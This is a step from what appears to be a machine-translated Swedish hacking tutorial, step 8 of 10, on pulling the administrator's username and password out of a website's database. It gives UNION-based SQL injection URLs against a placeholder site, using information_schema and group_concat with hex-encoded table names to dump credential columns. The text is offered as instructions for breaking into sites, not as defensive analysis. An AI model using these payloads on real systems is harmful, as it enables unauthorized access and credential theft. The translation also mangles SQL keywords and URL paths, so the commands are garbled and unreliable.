Guide till Hacking webbplats databas 101 (8 / 10 steg)
Steg 8: Att hitta administratörens användarnamn och lösenord - del 1
Detta är den sista etappen, ta bort de kommandon som är fet:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 unionen Välj 1, group_concat (column_name), 3,4,5,6,7,8 från information_schema.columns där table_name = 0x6e696674795f61646d696e--
Här är adressen du kvar:
http://Vulnerable.com/goodies.php?id=-1/Buy.php?id=-1 union select 1, group_concat (), 3,4,5,6,7, 8 från
Nu, mellan hakparenteserna från kommandot group_concat(), skriv i följande ord:
* Username_Column *, 0x20616e6420, * Password_Column *
Se till att byta * Username_Column * med ditt användarnamn kolumnnamn och den * Password_Column * med ditt lösenord kolumnnamn (i mitt fall, är admin användarnamn kolumnnamn och passera är kolumnnamnet lösenord)
Din webbadress ser nu ut ungefär så här:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 unionen Välj 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 från